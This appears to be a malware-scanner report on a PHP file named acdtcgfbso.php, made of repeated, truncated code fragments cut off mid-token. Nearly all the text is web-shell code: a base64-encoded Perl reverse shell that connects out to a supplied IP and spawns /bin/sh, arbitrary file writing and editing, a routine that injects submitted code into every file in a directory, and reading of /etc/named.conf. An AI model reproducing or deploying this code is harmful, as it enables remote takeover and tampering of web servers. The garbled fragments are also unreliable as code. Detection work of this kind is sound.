{$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfbfwrite was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File 277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894fclose was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File Done.</font><br />'; }else{ echo '<font color='red'>Edit File Error.</font><br />'; } fclose($_ba2773181c57); } echo '<form method='POST'>277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dfile_get_contents was found in the file acdtcgfbso.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) :(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33file_put_contents was found in the file acdtcgfbso.php 298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f3394d1c6c); echo '<br><br><br>';} }}326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decodfopen was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose(326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfbfwrite was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File 277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894fclose was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File Done.</font><br />'; }else{ echo '<font color='red'>Edit File Error.</font><br />'; } fclose($_ba2773181c57); } echo '<form method='POST'>277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dfread was found in the file acdtcgfbso.php 326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) 